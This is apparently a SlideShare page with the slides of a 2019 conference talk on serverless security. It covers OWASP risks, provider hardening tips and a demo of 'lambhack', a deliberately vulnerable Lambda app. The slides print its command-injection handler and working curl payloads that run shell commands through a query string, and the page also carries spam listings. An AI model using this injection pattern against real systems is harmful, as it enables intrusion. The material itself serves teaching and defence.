SlideShare uma empresa Scribd logo
1 de 93
Baixar para ler offline
Security in
the FaaS Lane
@wickett + @iteration1 @ Serverless Days Austin 2019
Want the slides?
james@signalsciences.com
@wickett + @iteration1 @ Serverless Days Austin 2019
James Wickett
Head of Research, Signal Sciences
Author, LinkedIn Learning
@wickett + @iteration1 @
Serverless Days Austin 2019
Karthik
Gaekwad
Principal Evangelist, Oracle Cloud
Infrastructure
cloudnative.oracle.com
@wickett + @iteration1 @
Serverless Days Austin 2019
Where we are going
* Serverless changes the security landscape
* Where security fits into serverless
* The Secure WIP model for serverless
* A quick look at lambhack
* Serverless provider security tips
@wickett + @iteration1 @ Serverless Days Austin 2019
What is
Serverless?
@wickett + @iteration1 @ Serverless Days Austin 2019
Serverless Definition
@wickett + @iteration1 @ Serverless Days Austin 2019
Serverless encourages functions as deploy units,
coupled with third party services that allow running
end-to-end applications without worrying about
system operation.
@wickett + @iteration1 @ Serverless Days Austin 2019
@wickett + @iteration1 @ Serverless Days Austin 2019
Serverless is
IT Value
@wickett + @iteration1 @ Serverless Days Austin 2019
...without worrying about
system operation
— About 2 minutes ago
@wickett + @iteration1 @ Serverless Days Austin 2019
Yasss! Ops (and security)
for free!
@wickett + @iteration1 @ Serverless Days Austin 2019
Ops burden to rationalize
serverless model
— @patrickdebois
@wickett + @iteration1 @ Serverless Days Austin 2019
Tech burden can only be
transferred
@wickett + @iteration1 @ Serverless Days Austin 2019
Applies to
security too
@wickett + @iteration1 @ Serverless Days Austin 2019
Security burden is not
created or destroyed (in
serverless), merely
transferred
@wickett + @iteration1 @ Serverless Days Austin 2019
Security is in
crisis
@wickett + @iteration1 @ Serverless Days Austin 2019
Inequitable Labor
Distribution
@wickett + @iteration1 @ Serverless Days Austin 2019
10:1
Dev:Ops
@wickett + @iteration1 @ Serverless Days Austin 2019
100:10:1
Dev:Ops:Sec
@wickett + @iteration1 @ Serverless Days Austin 2019
The new OSI
model
@wickett + @iteration1 @
Serverless Days Austin 2019
Security
knows the
crisis is real
@wickett + @iteration1 @ Serverless Days Austin 2019
Companies are spending a great
deal on security, but we read of
massive computer-related attacks.
Clearly something is wrong. The
root of the problem is twofold:
we’re protecting the wrong things,
and we’re hurting productivity in
the process.
@wickett + @iteration1 @
Serverless Days Austin 2019
[Security by risk assessment]
introduces a dangerous fallacy:
that structured inadequacy is
almost as good as adequacy and
that underfunded security efforts
plus risk management are about
as good as properly funded
security work
@wickett + @iteration1 @
Serverless Days Austin 2019
And the
survey says
@wickett + @iteration1 @ Serverless Days Austin 2019
While engineering teams are busy
deploying leading-edge technologies,
security teams are still focused on fighting
yesterday’s battles.
SANS 2018 DevSecOps Survey
@wickett + @iteration1 @ Serverless Days Austin 2019
95%
of security professionals spend their time
protecting legacy applications
@wickett + @iteration1 @ Serverless Days Austin 2019
"many security teams
work with a worldview
where their goal is to
inhibit change as much
as possible"
@wickett + @iteration1 @
Serverless Days Austin 2019
Serverless model doesn't
fit into security team's
worldview
@wickett + @iteration1 @ Serverless Days Austin 2019
How do we
change this?
@wickett + @iteration1 @ Serverless Days Austin 2019
WIP@wickett + @iteration1 @ Serverless Days Austin 2019
Secure WIP for Serverless
→ The code that you actually write
→ The code you inherited
→ The container you were provided
@wickett + @iteration1 @ Serverless Days Austin 2019
Secure WIP
means collaboration
DevSecOps
@wickett + @iteration1 @ Serverless Days Austin 2019
WIP
@wickett + @iteration1 @ Serverless Days Austin 2019
How to WIP?
@wickett + @iteration1 @ Serverless Days Austin 2019
Security seperation of concerns
OWASP Top 10 (2017)
@wickett + @iteration1 @ Serverless Days Austin 2019
VERY relevant in serverless
* A1 Injection
* A5 Broken Access Control
* A6 Security Misconfiguration
* A9 Components with known vulnerabilities
* A10 Insufficient Logging & Monitoring
..talk about these as we go along..
@wickett + @iteration1 @ Serverless Days Austin 2019
Secure WIP
@wickett + @iteration1 @ Serverless Days Austin 2019
Secure WIP
Write
@wickett + @iteration1 @ Serverless Days Austin 2019
OWASP A1-Injection
Issue: Data coming is hostile
* Same issues as in traditional apps, but more prevalent.
* Frontend frameworks made this transparent before.
@wickett + @iteration1 @ Serverless Days Austin 2019
OWASP A1-Injection
What should I do?
* Keep your data seperate from commands/queries.
* Verify you are sanitizing any data being stored.
* Pay attention to input validation.
* Use whitelist validation wherever possible.
@wickett + @iteration1 @ Serverless Days Austin 2019
OWASP A5-Broken Access Control
Issue: Users cannot act outside their intended
permissions.
* URL Modificiations
Example: lambhack demo with uname
* Metadata, Header manipulation
* Token Expiration (or lack thereof)
@wickett + @iteration1 @ Serverless Days Austin 2019
OWASP A5-Broken Access Control
What do I do?
* Deny by default strategy
* Have an access control mechanism in place
* Rate limit against automated tooling
* Log the failures (but not the sensitive data)
@wickett + @iteration1 @ Serverless Days Austin 2019
Serverless
Myth
@wickett + @iteration1 @ Serverless Days Austin 2019
You can't do command
execution through the API
gateway
— Anonymous Developer
@wickett + @iteration1 @ Serverless Days Austin 2019
@wickett + @iteration1 @ Serverless Days Austin 2019
Vulnerable Lambda + API Gateway stack
→ Wanted to see make the point that appsec is
relevant in serverless
→ Born from the heritage of WebGoat, Rails Goat …
@wickett + @iteration1 @ Serverless Days Austin 2019
Lambhack
→ A Vulnerable Lambda + API Gateway stack
→ Open Source, MIT licensed
→ Includes arbitrary code execution in a query
string
@wickett + @iteration1 @ Serverless Days Austin 2019
Basically a reverse shell in
http query string for lambda
@wickett + @iteration1 @ Serverless Days Austin 2019
func lambhackEvent(event *json.RawMessage,
context *sparta.LambdaContext,
w http.ResponseWriter,
logger *logrus.Logger) {
var lambdaEvent sparta.APIGatewayLambdaJSONEvent
_ = json.Unmarshal([]byte(*event), &lambdaEvent)
command := lambdaEvent.QueryParams["args"]
output := runner.Run(command)
logger.WithFields(logrus.Fields{
"Event": string(*event),
"Command": string(command),
"Output": string(output),
}).Info("Request received")
fmt.Fprintf(w, output)
time.Sleep(time.Second)
}
$ make provision
go run main.go provision -s lambhack
INFO[0000] ========================================
INFO[0000] Welcome to LambhackApplication GoVersion=go1.10 LinkFlags= Option=provision SpartaSHA=740028b SpartaVersion=0.20.1 UTC="2019-02-21T21:09:50Z"
INFO[0000] ========================================
INFO[0000] Provisioning service BuildID=8ffac7d463903457c5dc3221d5bf2b5fa0ee589c CodePipelineTrigger= InPlaceUpdates=false NOOP=false Tags=
INFO[0000] Verifying IAM Lambda execution roles
INFO[0000] IAM roles verified Count=1
INFO[0000] Checking S3 versioning Bucket=lambhack VersioningEnabled=false
INFO[0000] Running `go generate`
INFO[0000] Compiling binary Name=Sparta.lambda.amd64
INFO[0011] Executable binary size KB=22560 MB=22
INFO[0011] Creating code ZIP archive for upload TempName=./.sparta/LambhackApplication-code.zip
INFO[0011] Registering Sparta JS function FunctionName=main_lambhackEvent ScriptName=main_lambhackEvent
INFO[0011] Lambda function deployment package size KB=22659 MB=22
@wickett + @iteration1 @ Serverless Days Austin 2019
Description="API Gateway URL"
Key=APIGatewayURL
Value="https://XXXX.execute-api.us-east-1.amazonaws.com/prod"
@wickett + @iteration1 @ Serverless Days Austin 2019
uname -a
curl “<URL>/lambhack/c?args=uname+-a;+sleep+1"
returns
"Linux ip-10-131-13-166 4.14.94-73.73.amzn1.x86_64 
#1 SMP Tue Jan 22 20:25:24 UTC 2019 x86_64 x86_64 
x86_64 GNU/Linuxn"
@wickett + @iteration1 @ Serverless Days Austin 2019
/proc/version
curl “<URL>/lambhack/c?args=cat+/proc/version;+sleep+1"
returns
"Linux version 4.14.94-73.73.amzn1.x86_64 
(mockbuild@gobi-build-64001) 
(gcc version 7.2.1 20170915 
(Red Hat 7.2.1-2) (GCC)) 
#1 SMP Tue Jan 22 20:25:24 UTC 2019n"
Look in /tmp
curl “<URL>/lambhack/c?args=ls+-la+/tmp;+sleep+1"
returns
total 8
drwx------ 2 sbx_user1064 482 4096 Feb 21 22:35 .
drwxr-xr-x 21 root root 4096 Feb 21 17:51 ..
@wickett + @iteration1 @ Serverless Days Austin 2019
I can haz web proxy
curl “<URL>/lambhack/c?args=curl+https://www.example.com;+sleep+1"
returns
<!doctype html>
<html>
<head>
<title>Example Domain</title>
<meta charset="utf-8" />
...
github.com/wickett/lambhack
@wickett + @iteration1 @ Serverless Days Austin 2019
AppSec Thoughts from Lambhack
→ Lambda has limited Blast Radius, but not zero
→ Monitoring/Logging plays a key role here
→ Detect longer run times
→ Higher error rate occurrences
→ Log actions of lambdas
@wickett + @iteration1 @ Serverless Days Austin 2019
Secure WIP
Inherit
@wickett + @iteration1 @ Serverless Days Austin 2019
It all seems so simple...
222 Lines of Code
5 direct dependencies
54 total deps (incl. indirect)
(example thanks to snyk.io)
@wickett + @iteration1 @ Serverless Days Austin 2019
460,046 Lines
of Code
@wickett + @iteration1 @ Serverless Days Austin 2019
Most defect density
studies range from .5 to
10 defects per KLOC
@wickett + @iteration1 @ Serverless Days Austin 2019
More importantly, defect
density is not zero
@wickett + @iteration1 @ Serverless Days Austin 2019
Vulnerabilities are just
exploitable defects
@wickett + @iteration1 @ Serverless Days Austin 2019
OWASP-A9 Components with known
vulnerabilities
What should I do?
* Monitor dependencies continuously.
* If you use a Docker based system, use the registry scanning tools.
* Watch for CVE's (they will happen).
@wickett + @iteration1 @ Serverless Days Austin 2019
OWASP-A6 Security Misconfiguration
Issue: Configuration or misconfiguration
* Function permissiveness and roles (too much privilege)
* Configuration for services (supporting cloud based services)
* Security configuration left in logging
@wickett + @iteration1 @ Serverless Days Austin 2019
OWASP-A6 Security Misconfiguration
What should I do?
* Consider limiting your blast radius
* Harden security provider config (IAM/storage)
* Scan for global bucket read/write access
* Use a principle of least privilege
* Enterprise setting: MFA to access cloud console
@wickett + @iteration1 @ Serverless Days Austin 2019
Most common attacks
(Via puresec whitepaper)
→ Crypto Mining (via remote code execution)
→ Hijacking business flow
→ Denial of wallet
→ Data misconfiguration
@wickett + @iteration1 @ Serverless Days Austin 2019
Secure WIP
Provided
@wickett + @iteration1 @ Serverless Days Austin 2019
Platform Help
@wickett + @iteration1 @ Serverless Days Austin 2019
Vendor Best Practices
→ AWS
→ Google Cloud
→ Azure
→ Oracle Cloud Infrastructure
@wickett + @iteration1 @ Serverless Days Austin 2019
AWS
@wickett + @iteration1 @ Serverless Days Austin 2019
Gone in 60 Milliseconds
Intrusion and Exfiltration in Server-less Architecture
https://media.ccc.de/v/33c3-7865-
gonein60_milliseconds
@wickett + @iteration1 @ Serverless Days Austin 2019
Focus on IAM
Roles and
Policies
@wickett + @iteration1 @ Serverless Days Austin 2019
Good hygiene
* Disable root access keys
* Manage users with profiles
* Secure your keys in your deploy system
* Secure keys in dev system
* Use provider MFA
@wickett + @iteration1 @ Serverless Days Austin 2019
AWS lets you
roll your own
@wickett + @iteration1 @ Serverless Days Austin 2019
Choose your own adventure
→ Your very own Honeypot
→ Defend scanners and attack tooling
→ Parsing reputation lists
→ Deal with whitelisting/blacklisting
→ Tuning WAF Regex rules
@wickett + @iteration1 @ Serverless Days Austin 2019
Cool, but not exactly a friendly setup for
devs or ops
@wickett + @iteration1 @ Serverless Days Austin 2019
Azure
→ Lots of great resources in the docs
→ Overview
→ Security Policy
→ Key Vault Service
@wickett + @iteration1 @ Serverless Days Austin 2019
Google Cloud
→ Follow IAM and data best practices
→ Security command
→ Storage best practices
@wickett + @iteration1 @ Serverless Days Austin 2019
Oracle Cloud Infrastructure
→ Use compartments concepts and IAM to limit
blast radius
→ Limit specific user/group access to specific
compartments
→ Security guidance
@wickett + @iteration1 @ Serverless Days Austin 2019
What about roll your own?
→ Knative
→ OpenFaaS
→ Fn
→ and others...
@wickett + @iteration1 @ Serverless Days Austin 2019
Kubernetes Security
→ Many Faas providers can use K8s to deploy/scale
→ Use K8s best practices
→ Starting point- SignalSciences Webinar on
cloudnative security
@wickett + @iteration1 @ Serverless Days Austin 2019
Security Pitfalls for serverless
* Auditors/Compliance
* Lack of instrumentation
* Lack of security controls in dev pipeline
* Provider config
* Lambhack as a way to facilitate conversations
@wickett + @iteration1 @ Serverless Days Austin 2019
Security's Path
to Influence
1. Identify Resource Misutilization
2. Add Telemetry and Feedback
Loops
3. Automate and Monitor Across
the Software Pipeline
4. Influence Organizational
Culture
The New Security Playbook
* Speed up delivery instead of blocking
* Empathy towards devs and ops
* Normal - provide value by making security normal
* Automate - security testing in every phase
@wickett + @iteration1 @ Serverless Days Austin 2019
Conclusions
* Use the Secure WIP model
* Involve security team in serverless
* New Security Playbook
* Foster discussion on where to apply controls
@wickett + @iteration1 @ Serverless Days Austin 2019
Want the slides?
james@signalsciences.com
@wickett + @iteration1 @ Serverless Days Austin 2019

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

DevSecOps and the New Path Forward
DevSecOps and the New Path ForwardDevSecOps and the New Path Forward
DevSecOps and the New Path Forward
 
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
 
A DevSecOps Tale of Business, Engineering, and People
A DevSecOps Tale of Business, Engineering, and PeopleA DevSecOps Tale of Business, Engineering, and People
A DevSecOps Tale of Business, Engineering, and People
 
Defining DevSecOps
Defining DevSecOpsDefining DevSecOps
Defining DevSecOps
 
Scale DevSecOps with your Continuous Integration Pipeline
Scale DevSecOps with your Continuous Integration PipelineScale DevSecOps with your Continuous Integration Pipeline
Scale DevSecOps with your Continuous Integration Pipeline
 
Pragmatic Pipeline Security
Pragmatic Pipeline SecurityPragmatic Pipeline Security
Pragmatic Pipeline Security
 
DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...
DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...
DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...
 
DevSecOps Singapore 2017 - Security in the Delivery Pipeline
DevSecOps Singapore 2017 - Security in the Delivery PipelineDevSecOps Singapore 2017 - Security in the Delivery Pipeline
DevSecOps Singapore 2017 - Security in the Delivery Pipeline
 
DevSecOps: A New Hope for Security in CI/CD
DevSecOps: A New Hope for Security in CI/CDDevSecOps: A New Hope for Security in CI/CD
DevSecOps: A New Hope for Security in CI/CD
 
Serverless Security: Doing Security in 100 milliseconds
Serverless Security: Doing Security in 100 millisecondsServerless Security: Doing Security in 100 milliseconds
Serverless Security: Doing Security in 100 milliseconds
 
RSAC DevSecOpsDays 2018 - We are all Equifax
RSAC DevSecOpsDays 2018 - We are all EquifaxRSAC DevSecOpsDays 2018 - We are all Equifax
RSAC DevSecOpsDays 2018 - We are all Equifax
 
Adversary Driven Defense in the Real World
Adversary Driven Defense in the Real WorldAdversary Driven Defense in the Real World
Adversary Driven Defense in the Real World
 
DevSecOps at Agile 2019
DevSecOps at   Agile 2019 DevSecOps at   Agile 2019
DevSecOps at Agile 2019
 
DevSecOps reference architectures 2018
DevSecOps reference architectures 2018DevSecOps reference architectures 2018
DevSecOps reference architectures 2018
 
Harnessing the power of cloud for real security
Harnessing the power of cloud for real securityHarnessing the power of cloud for real security
Harnessing the power of cloud for real security
 
DevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOpsDevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOps
 
New Farming Methods in the Epistemological Wasteland of Application Security
New Farming Methods in the Epistemological Wasteland of Application SecurityNew Farming Methods in the Epistemological Wasteland of Application Security
New Farming Methods in the Epistemological Wasteland of Application Security
 
Introduction to DevSecOps
Introduction to DevSecOpsIntroduction to DevSecOps
Introduction to DevSecOps
 
The New Ways of Chaos, Security, and DevOps
The New Ways of Chaos, Security, and DevOpsThe New Ways of Chaos, Security, and DevOps
The New Ways of Chaos, Security, and DevOps
 
How to Effect Change in the Epistemological Wasteland of Application Security
How to Effect Change in the Epistemological Wasteland of Application SecurityHow to Effect Change in the Epistemological Wasteland of Application Security
How to Effect Change in the Epistemological Wasteland of Application Security
 

Semelhante a Security in the FaaS Lane

Semelhante a Security in the FaaS Lane (20)

Recap of de code 2019
Recap of de code 2019Recap of de code 2019
Recap of de code 2019
 
apidays Australia 2023 - API Security Breach Analysis & Empowering Devs to M...
apidays Australia  2023 - API Security Breach Analysis & Empowering Devs to M...apidays Australia  2023 - API Security Breach Analysis & Empowering Devs to M...
apidays Australia 2023 - API Security Breach Analysis & Empowering Devs to M...
 
Pushing Swift to the Server
Pushing Swift to the ServerPushing Swift to the Server
Pushing Swift to the Server
 
apidays LIVE Australia 2020 - From micro to macro-coordination through domain...
apidays LIVE Australia 2020 - From micro to macro-coordination through domain...apidays LIVE Australia 2020 - From micro to macro-coordination through domain...
apidays LIVE Australia 2020 - From micro to macro-coordination through domain...
 
Why Automate the Network?
Why Automate the Network?Why Automate the Network?
Why Automate the Network?
 
쿠버네티스를 이용한 기능 브랜치별 테스트 서버 만들기 (GitOps CI/CD)
쿠버네티스를 이용한 기능 브랜치별 테스트 서버 만들기 (GitOps CI/CD)쿠버네티스를 이용한 기능 브랜치별 테스트 서버 만들기 (GitOps CI/CD)
쿠버네티스를 이용한 기능 브랜치별 테스트 서버 만들기 (GitOps CI/CD)
 
Swift Summit: Pushing the boundaries of Swift to the Server
Swift Summit: Pushing the boundaries of Swift to the ServerSwift Summit: Pushing the boundaries of Swift to the Server
Swift Summit: Pushing the boundaries of Swift to the Server
 
Infrastructure design for Kubernetes
Infrastructure design for KubernetesInfrastructure design for Kubernetes
Infrastructure design for Kubernetes
 
Microservices with kubernetes @190316
Microservices with kubernetes @190316Microservices with kubernetes @190316
Microservices with kubernetes @190316
 
SpringBoot and Spring Cloud Service for MSA
SpringBoot and Spring Cloud Service for MSASpringBoot and Spring Cloud Service for MSA
SpringBoot and Spring Cloud Service for MSA
 
Introducing the New Features of AWS Greengrass (IOT365) - AWS re:Invent 2018
Introducing the New Features of AWS Greengrass (IOT365) - AWS re:Invent 2018Introducing the New Features of AWS Greengrass (IOT365) - AWS re:Invent 2018
Introducing the New Features of AWS Greengrass (IOT365) - AWS re:Invent 2018
 
2022 APIsecure_From Shift Left to Full Circle - A Pragmatic Approach to Catch...
2022 APIsecure_From Shift Left to Full Circle - A Pragmatic Approach to Catch...2022 APIsecure_From Shift Left to Full Circle - A Pragmatic Approach to Catch...
2022 APIsecure_From Shift Left to Full Circle - A Pragmatic Approach to Catch...
 
Building APIs in a Cloud Native Era
Building APIs in a Cloud Native EraBuilding APIs in a Cloud Native Era
Building APIs in a Cloud Native Era
 
apidays LIVE Paris - Building APIs in a Cloud Native era by Nuwan Dias
apidays LIVE Paris - Building APIs in a Cloud Native era by Nuwan Diasapidays LIVE Paris - Building APIs in a Cloud Native era by Nuwan Dias
apidays LIVE Paris - Building APIs in a Cloud Native era by Nuwan Dias
 
Continuous (Non)-Functional Testing of Microservices on k8s
Continuous (Non)-Functional Testing of Microservices on k8s Continuous (Non)-Functional Testing of Microservices on k8s
Continuous (Non)-Functional Testing of Microservices on k8s
 
SQL Days 2019 - Kubernetes 101
SQL Days 2019 - Kubernetes 101SQL Days 2019 - Kubernetes 101
SQL Days 2019 - Kubernetes 101
 
Deployment Patterns for API Gateways
Deployment Patterns for API GatewaysDeployment Patterns for API Gateways
Deployment Patterns for API Gateways
 
APIdays Zurich 2019 - Deployment Patterns for API Gateways Estelle Auberix, N...
APIdays Zurich 2019 - Deployment Patterns for API Gateways Estelle Auberix, N...APIdays Zurich 2019 - Deployment Patterns for API Gateways Estelle Auberix, N...
APIdays Zurich 2019 - Deployment Patterns for API Gateways Estelle Auberix, N...
 
Introduction to Serverless Computing - OOP Munich
 Introduction to Serverless Computing - OOP Munich Introduction to Serverless Computing - OOP Munich
Introduction to Serverless Computing - OOP Munich
 
Web APIs - Mobiletech Conference 2015
Web APIs - Mobiletech Conference 2015Web APIs - Mobiletech Conference 2015
Web APIs - Mobiletech Conference 2015
 

Mais de James Wickett

Mais de James Wickett (18)

A Pragmatic Union: Security and SRE
A Pragmatic Union: Security and SREA Pragmatic Union: Security and SRE
A Pragmatic Union: Security and SRE
 
A Way to Think about DevSecOps: MEASURE
A Way to Think about DevSecOps: MEASUREA Way to Think about DevSecOps: MEASURE
A Way to Think about DevSecOps: MEASURE
 
The Security, DevOps, and Chaos Playbook to Change the World
The Security, DevOps, and Chaos Playbook to Change the WorldThe Security, DevOps, and Chaos Playbook to Change the World
The Security, DevOps, and Chaos Playbook to Change the World
 
A Tale of Woe, Chaos, and Business
A Tale of Woe, Chaos, and BusinessA Tale of Woe, Chaos, and Business
A Tale of Woe, Chaos, and Business
 
The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019
 
NewOps Days 2019: The New Ways of Chaos, Security, and DevOps
NewOps Days 2019: The New Ways of Chaos, Security, and DevOpsNewOps Days 2019: The New Ways of Chaos, Security, and DevOps
NewOps Days 2019: The New Ways of Chaos, Security, and DevOps
 
The Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CDThe Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CD
 
The DevSecOps Builder’s Guide to the CI/CD Pipeline
The DevSecOps Builder’s Guide to the CI/CD PipelineThe DevSecOps Builder’s Guide to the CI/CD Pipeline
The DevSecOps Builder’s Guide to the CI/CD Pipeline
 
DevSecOps and the CI/CD Pipeline
 DevSecOps and the CI/CD Pipeline DevSecOps and the CI/CD Pipeline
DevSecOps and the CI/CD Pipeline
 
The State of DevSecOps in 2018
The State of DevSecOps in 2018The State of DevSecOps in 2018
The State of DevSecOps in 2018
 
DevSecOps in the Year 2018
DevSecOps in the Year 2018DevSecOps in the Year 2018
DevSecOps in the Year 2018
 
AppSec California 2018: The Path of DevOps Enlightenment for InfoSec
AppSec California 2018: The Path of DevOps Enlightenment for InfoSecAppSec California 2018: The Path of DevOps Enlightenment for InfoSec
AppSec California 2018: The Path of DevOps Enlightenment for InfoSec
 
LambHack: A Vulnerable Serverless Application
LambHack: A Vulnerable Serverless ApplicationLambHack: A Vulnerable Serverless Application
LambHack: A Vulnerable Serverless Application
 
Defense-Oriented DevOps for Modern Software Development
Defense-Oriented DevOps for Modern Software DevelopmentDefense-Oriented DevOps for Modern Software Development
Defense-Oriented DevOps for Modern Software Development
 
Innotech Austin 2017: The Path of DevOps Enlightenment for InfoSec
Innotech Austin 2017: The Path of DevOps Enlightenment for InfoSecInnotech Austin 2017: The Path of DevOps Enlightenment for InfoSec
Innotech Austin 2017: The Path of DevOps Enlightenment for InfoSec
 
Serverless Security at LASCON 2017
Serverless Security at LASCON 2017Serverless Security at LASCON 2017
Serverless Security at LASCON 2017
 
The Path of DevOps Enlightenment for InfoSec
The Path of DevOps Enlightenment for InfoSecThe Path of DevOps Enlightenment for InfoSec
The Path of DevOps Enlightenment for InfoSec
 
The Path of DevOps Enlightenment for InfoSec
The Path of DevOps Enlightenment for InfoSecThe Path of DevOps Enlightenment for InfoSec
The Path of DevOps Enlightenment for InfoSec
 

Último

%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
masabamasaba
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
VictoriaMetrics
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
masabamasaba
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 

Último (20)

WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
Artyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptxArtyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptx
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
WSO2CON 2024 Slides - Unlocking Value with AI
WSO2CON 2024 Slides - Unlocking Value with AIWSO2CON 2024 Slides - Unlocking Value with AI
WSO2CON 2024 Slides - Unlocking Value with AI
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
WSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security ProgramWSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security Program
 
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
 
WSO2Con2024 - Hello Choreo Presentation - Kanchana
WSO2Con2024 - Hello Choreo Presentation - KanchanaWSO2Con2024 - Hello Choreo Presentation - Kanchana
WSO2Con2024 - Hello Choreo Presentation - Kanchana
 
tonesoftg
tonesoftgtonesoftg
tonesoftg
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
WSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go Platformless
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
WSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - KeynoteWSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - Keynote
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 

Security in the FaaS Lane

  • 1. Security in the FaaS Lane @wickett + @iteration1 @ Serverless Days Austin 2019
  • 2. Want the slides? james@signalsciences.com @wickett + @iteration1 @ Serverless Days Austin 2019
  • 3. James Wickett Head of Research, Signal Sciences Author, LinkedIn Learning @wickett + @iteration1 @ Serverless Days Austin 2019
  • 4. Karthik Gaekwad Principal Evangelist, Oracle Cloud Infrastructure cloudnative.oracle.com @wickett + @iteration1 @ Serverless Days Austin 2019
